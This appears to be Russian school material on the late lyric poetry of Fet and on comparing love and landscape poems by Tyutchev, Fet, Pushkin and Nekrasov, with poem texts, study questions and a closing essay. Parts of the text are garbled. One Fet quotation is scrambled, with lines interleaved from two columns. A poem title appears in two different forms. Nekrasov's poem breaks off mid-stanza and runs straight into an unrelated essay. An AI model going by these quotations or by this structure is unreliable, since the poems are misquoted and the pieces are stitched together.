Заключительный этап поэтического творчества Фета (1870-1892). Если раньше поэт в своих стихах находил «душевное успо­коение и усладу, то теперь она его тревожит и мучит».

Четыре сборника «Вечерние огни» (1883, 1885, 1888, 1891). Вся лирика этих сборников пронизана ощущением того, что мир как бы «распадается на части», потеряв «стройность». Все больше тревоги, боли и смятения появляется в стихах Фета.

«В вечер такой золотистый и яс­ный» (1886), «Одним толчком согнуть ладью живую» (1887), «Ни­когда» (1879), «Ночь лазурная смотрит на скошенный луг...» (1892).

Переводческая деятельность. Фет переводит античных поэтов, а также произведения Гете, Шиллера, Гейне, Байрона, трагедии Шекспира и других. В переводах стремится к точности. «Ко­нечно, перевожу буквально», - пишет Фет в письме В. С. Соловьеву.

А. А. Фет - поэт «чистого искусства». Фет постоянно подчеркивал, что поэзия не должна быть свя­зана с жизнью, а поэту не следует «рассуждать», вмешиваться в житейские дела, по его выражению, «бедного мира».

Таким образом, вопросов общественной жизни в своих сти­хотворениях он не касался. Фет «никогда не мог понять, чтобы искусство интересовалось чем-либо, помимо красоты», и выступал защитником «чистого искусства» (как и его единомышленники по взглядам на искусство: В. П. Боткин, А. В. Дружинин, Я. П. Полон­ский, А. Н. Майков и другие). Поэт стремился противопоставить искусство действительности. Отворачиваясь от трагических сторон действительности, от тех вопросов, которые мучительно волновали его современников, Фет ограничил свою поэзию темами:

а) родина; б) природа; в) любовь; г) поэт и поэзия (искусство).

Темы родины и природы «нераздельны». Фет умел «очелове­чить» русскую природу, найти в ней отзвук своим настроениям.

Любовь в изображении Фета - олицетворение и печали, и треволнений, и легкой радости. Любовная лирика отличается бо­гатством оттенков, нежностью и душевной теплотой.

У Фета много стихотворений об искусстве, о роли поэта и поэзии: «Одним толчком согнать ладью живую...», «На стоге се­на ночью южной...» и другие. Искусство, по мнению поэта, не должно быть связано с жизнью. Поэт писал:

Неизбежно,

В мир стремлений,

Страстно, нежно

Преклонений

Уповать,

И молитв;

Без усилий

Радость чуя,

С плеском крылий

Не хочу я

Залетать

Ваших битв.

Действительно, поэзия Фета - поэзия намеков, догадок, умолчаний. Стихи - это лирические миниатюры, с помощью кото­рых поэт передает «едва уловимые переживания человека, органи­чески связанного с природой».

Что поражало современников в поступках и характере Фета?

Двойственность: Фет - проникновенный лирик и поклон­ник красоты во всех ее проявлениях, и Фет - жестокий и расчет­ливый хозяин, яростный защитник помещичьих интересов.

III . Сравнительный анализ стихотворений Ф.И. Тютчева и А.А. Фета. Пейзажная лирика.

1.

Ф. Тютчев

Осенний вечер

Есть в светлости осенних вечеров

Умильная, таинственная прелесть;

Зловещий блеск и пестрота дерев,

Багряных листьев томный, легкий шелест,

Туманная и тихая лазурь

Над грустно-сиротеющей землею,

И, как предчувствие сходящих бурь,

Порывистый, холодный ветр порою,

Ущерб, изнеможенье - и на всем

Та кроткая улыбка увяданья,

Что в существе разумном мы зовем

Божественной стыдливостью страданья. 1830

А. Фет

* * *

Я пришел к тебе с приветом

Рассказать , что солнце встало ,

Что оно горячим светом

По листам затрепетало ;

Рассказать , что лес проснулся ,

Весь проснулся , веткой каждой,

Каждой птицей встрепенулся

И весенней полон жаждой;

Рассказать , что с той же страстью,

Как вчера, пришел я снова,

Что душа все так же счастью

И тебе служить готова;

Рассказать , что отовсюду

На меня весельем веет ,

Что не знаю сам, что буду

Петь - но только песня зреет.

1843

Что общего между этими стихотворениями (тема, главная мысль, пафос, ос­новной художественный прием)?

Эти стихотворения связывает общий художественный прием - психологический параллелизм. Оба произведения включают в себя пейзажные зарисовки, но очень разные, и не только потому, что Тютчев пишет об осени, а Фет о весне или лете.

В каждом из этих стихотворений одно предложение. У Тютчева это единая, целостная картина увядания природы. Описание природы обогащено множеством эпитетов. Именно эпитеты создают торжественный и трагичный образ осени. Лирический герой Тютчева, любуясь красотой осеннего увядания, уподобляет его человеческому страданию. В последней строке стыдливость страдания человека названа божественной. Страдание человека столь же величественно, как и печальные перемены в Божьем мире. Лирический герой смотрит на мир со стороны, он наблюдает, анализирует и сопоставляет явления жизни.

Одно стихотворение изобилует эпитетами (выделите их), другое - глаголами (что это за глаголы? Зачем один глагол несколько раз повторяется?). Какой эф­фект это создает?

Интересно, что в стихотворении Тютчева только два глагола, один из которых незаметный, незначительный - есть. Второй - зовем - подводит итог, называет, фиксирует смысл сказанного. Стихотворение написано в форме элегии - думать об осени и страдании всегда грустно, а для размышлений собеседник не нужен.

В каком стихотворении лирический герой участвует в общей жизни на земле, а в каком - словно смотрит со стороны?

Попробуйте раскрасить стихи, обращая внимание на слова, имеющий свой цвет. Какое из стихотворений более цветное и почему? Как это связано с содержанием текста?

Какое стихотворение написано в форме послания (обращения к другому чело­веку), а какое - в форме элегии (грустного размышления)? Почему избрана имен­но эта форма?

Сравнивая эти стихотворения, мы видим удивительное поэтическое мастерство двух русских поэтов. Используя как основной прием психологический параллелизм, обращаясь к картинам природы, Фет создает картину состояния лирического героя в единстве с состоянием природы. Его лирический герой - часть Божьего мира. Тютчев же использует картины природы для сравнения с состоянием человека вообще. Не случайно в стихотворении нет местоимения я. Есть мы, то есть люди вообще. Лирический герой Тютчева - наблюдатель, аналитик, мыслитель.

2. Сопоставительный анализ стихотворений Ф. Тютчева и А. Фета. Любовная лирика.

Перед вами тексты двух стихотворений. Внимательно прочитайте их, сопоставьте, затем запишите ваши наблюдения.

Что объединяет эти стихотворения? Для ответа на этот вопрос обозначьте цве­том: слова, обозначающие время; описания (пейзаж, портрет); чувства, ощущения лирического героя, состояние, чувства девушки.

Какие образы и как созданы в стихотворении Тютчева (женский образ, образ лирического героя, пейзаж, время)?

Какие отношения связывают лирического героя и девушку? Важно ли это?

С какой целью поэт настойчиво обращает внимание на приметы угасающего дня?

Сравните эпитеты, использованные в первых двух стро­ках третьей строфы.

Для чего использована эта антитеза?

В каких строчках сформу­лирована главная мысль стихотворения?

Каким настроением (пафосом) оно проник­нуто?

Что можно сказать о лирическом герое стихотворения?

Какой образ в стихот­ворении является доминирующим (важнейшим)?

Какие образы и как созданы Фетом (женский образ, образ лирического героя, пейзаж, время)?

Какой из них является доминирующим (главенствующим)?

Каким пафосом проникнуто стихотворение?

Сравните результаты анализа стихотворений и сделайте вывод об особенностях лирики двух поэтов.

Ф. Тютчев

* * *

Я помню время золотое,

Я помню сердцу милый край.

День вечерел; мы были двое,

Внизу, в тени, шумел Дунай.

И на холму, там, где, белея,

Руина замка вдаль глядит,

Стояла ты, младая фея,

На мшистый опершись гранит,

Ногой младенческой касаясь

Обломков груды вековой;

И солнце медлило, прощаясь

С холмом, и замком, и тобой.

И вечер тихий мимолетом

Твоей одеждою играл

И с диких яблонь цвет за цветом

На плечи юные свевал.

Ты беззаботно вдаль глядела...

Край неба дымно гас в лучах;

День догорал; звучнее пела

Река в померкших берегах.

И ты с веселостью беспечной

Счастливый провожала день;

И сладко жизни быстротечной

Над нами пролетала тень.

1836

А. Фет

* * *

Когда мои мечты за гранью прошлых дней

Найдут тебя опять за дымкою туманной,

Я плачу сладостно, как иудей

На рубеже земли обетованной.

Не жаль мне детских игр, не жаль мне тихих снов,

Тобой так сладостно и больно возмущенных

В те дни, как постигал я первую любовь

По бунту чувств неугомонных,

По сжатию руки, по отблеску очей,

Сопровождаемым то вздохами, то смехом,

По ропоту простых незначащих речей,

Лишь нам звучащих страсти эхом.

1844

Оба эти стихотворения - воспоминания о счастливом прошлом, связанные с образом девушки. И это, пожалуй, единственное, что их роднит.

В стихотворении Тютчева большое место (четыре с половиной из шести строф) уделено описанию: пейзажу и портрету. Место, время года и время суток точно обозначены. Картина живописна, но лирический герой как будто любуется ею со стороны, и мы не знаем, какие отношения связывают его с его юной спутницей, да это, видимо, и не важно: чувства героя не названы, а девушка беспечно весела не оттого, что влюблена или кокетничает с героем, - она просто очень молода.

Все стихотворение построено на антитезах: высокий берег - внизу река, вверху еще солнце - внизу уже померкли берега, вековая груда камней - мла­денческая нога девушки. Река, камни, небо - все это существует дол го. Человеческая жизнь коротка и быстротечна, ее радости уходят так же быстро, как уходит за горизонт солнце, как отцветают и осыпаются яблони.

В стихотворении три плана времени: неподвижное «золотое время» этой встречи на берегу Дуная, неподвижное нынешнее («я помню») - время воспо­минания и незаметно летящее время, быстротечность которого ощущает лирический герой.

Главная мысль стихотворения сформулирована в двух последних строчках. Вспоминая со­бытия далекого угасающего дня на берегу Дуная, лирический герой с грустью думает о быстротечности человеческой жизни. Образ времени доминирует в стихотворении. Мотивы любви, природы Тютчеву необходимы для философских размышлений о жизни вообще.

В первой строфе стихотворения Фета два плана времени: прошлое и настоящее. Разрыв между ними усилен библейским мотивом в сравнении. Все остальное - воспоминания о чувствах, подаренных лирическому герою первой любовью. Фет - импрессионист, поэт ощу­щения.

3. О собенности любов­ной лирики Некрасова, Пушкина, Тютчева, Фета.

«Клиповое сознание» - это бешеный темп, смена ярких кадров, фиксация от­дельных картинок для создания общего впечатления. Заставим «говорить» с помощью цвета сразу несколько стихотворений.

Сравните четыре стихотворения разных авторов.

Художественный анализ стихотворений

А. С. Пушкин

СОЖЖЕННОЕ ПИСЬМО

Прощай, письмо любви! прощай: она велела...

Как долго медлил я! как долго не хотела

Рука предать огню все радости мои!..

Но полно, час настал. Гори, письмо любви.

Готов я; ничему душа моя не внемлет.

Уж пламя жадное листы твои приемлет...

Минуту!.. вспыхнули! пылают - легкий дым,

Виясь, теряется с молением моим.

Уж перстня верного утратя впечатленье,

Растопленный сургуч кипит... О провиденье!

Свершилось! Темные свернулися листы;

На легком пепле их заветные черты

Белеют... Грудь моя стеснилась. Пепел милый,

Отрада бедная в судьбе моей унылой,

Останься век со мной на горестной груди... 1825

1. Перескажите стихотворение. Какое событие передаёт автор?

2. Сколько в нем действующих лиц? Через какие слова и образы они передаются?

3. Какое настроение сопровождает стихотворение?

Ф.И. Тютчев

Она сидела на полу

И груду писем разбирала,

И, как остывшую золу,

Брала их в руки и бросала.

Брала знакомые листы

И чудно так на них глядела,

Как души смотрят с высоты

На ими брошенное тело...

О, сколько жизни было тут,

Невозвратимо пережитой!

О, сколько горестных минут,

Любви и радости убитой!..

Стоял я молча в стороне

И пасть готов был на колени,

И страшно грустно стало мне,

Как от присущей милой тени. 1858

Н.А. Некрасов

О письма женщины, нам милой!

От вас восторгам нет числа,

Но в будущем душе унылой

Готовите вы больше зла.

Когда погаснет пламя страсти

Или послушаетесь вы

Благоразумья строгой власти

И чувству скажете: увы!

Отдайте ей ее посланья

Девятнадцатый век подарил человечеству бесценные духовные сокровища. Среди замечательных писателей и поэтов этого поистине золотого века достойное место принадлежит А. А. Фету и Ф. И. Тютчеву. Ф.И.Тютчев – лирик, его стихотворения полны философии и психологии. Певец природы, мастер стихотворного пейзажа, выражающего чувства человека. Мир лирики Тютчева наполнен таинственностью и загадками. Излюбленный прием поэта – антитеза: «дольный мир» противостоит «высям ледяным», тусклая земля – блистающему грозой небу, свет – тени. Тютчев не ограничивал себя в описании природы. В его стихотворениях мы видим и утро в горах, и ночное море, и летний вечер. Тютчев старается запечатлеть таинственные картины природы при переходе из одного состояния в другое. К примеру, в стихотворении «Тени сизые смесились…» мы можем увидеть, как наступает ночь, поэт постепенно описывает нам сначала то, как сгущаются сумерки, а после – наступление ночи. Изобилие глаголов и бессоюзных конструкций помогают Ф.И.Тютчеву сделать стихотворения динамичными. Поэт относится к природе, как к живому существу, поэтому в своих стихотворениях одухотворяет ее: «Не то, что мните вы, природа: Не слепок, не бездушный лик – В ней есть душа, в ней есть свобода В ней есть любовь, в ней есть язык….». Лирика А. А. Фета занимает особое место среди шедевров русской ли¬тературы. И это не удивительно — Афанасий Афанасьевич Фет был нова¬тором своего времени в области стиха, обладал особым, неповторимым даром тончайшего лирика. Его поэтическая манера письма, «фетовский почерк»; придали его поэзии неповторимое очарование и прелесть. Фет был новатором во многих отношениях. Он раскрепощал слово, не зако¬вывал его в рамки традиционных норм, а творил, стремясь выразить свою душу и чувства, наполняющие ее. Удивляет то, как изображена природа у Фета. Она настолько очелове¬чена, что мы часто встречаем «травы в рыдании», «овдовевшую лазурь», «лес проснулся, весь проснулся, веткой каждой». Этих великий поэтов Золотого века объединяет, прежде всего, патриотизм и огромная любовь к России. Их поэзия – это выражение богатой внутренней жизни авторов, результат неутомимой работы мысли, вся палитра чувств, волновавших их. Тютчева и Фета объединяют вечные темы: природа, любовь, красота. Наиболее ярко в творчестве Тютчева изображена природа. С самого детства живут в памяти сказочные строки: «Чародейкою Зимою Околдован, лес стоит… Сном волшебным очарован, Весь опутан, весь окован Легкой цепью пуховой…» Фет - один из замечательнейших поэтов-пейзажистов. В его стихах весна сходит на землю “невестою-царицей”. Фет описывает природу детально, ни один штрих не ускользает от его пристального взгляда: «Шепот, робкое дыханье, Трели соловья, Серебро и колыханье Сонного ручья…» Лучшими в лирике Тютчева, на мой взгляд, являются стихи о любви. В ранних произведениях любовь - радость, восторг, “весна в груди”. В более поздних все чаще звучат трагические ноты. Все, о чем писал поэт, было пережито и перечувствовано ки самим. Наиболее трогательным является “Денисьевский цикл”, посвященный Е. А. Денисьевой, самой большой любви поэта. Любимая для Тютчева - “неразгаданная тайна”, “живая прелесть дышит в ней”. Основополагающей для всего творчества Фета является тема любви. Этому способствовали драматические обстоятельства, имевшие место в дни его ранней молодости. Находясь на службе в Херсонской области, Фет познакомился с Марией Лазич — девушкой из небогатой семьи. Они полюбили друг друга, но будущий поэт, не имевший никаких средств к жизни, не смог на ней жениться. Девушка вскоре трагически погибла. Всю жизнь, до конца дней Фет не мог ее забыть. Очевидно, жизненная драма внутри, как подземный ключ, питала его лирику. В творчестве замечательных русских поэтов Ф. И. Тютчева и А. А. Фета на первом месте стояли не социальные конфликты, не политические потрясения, а жизнь человеческой души - любовь и горечь утраты, путь от юношеской восторженности к стариковской мудрости и великодушию, размышления о жизни и смерти, о смысле творчества, о беспредельности Вселенной, о величии природы.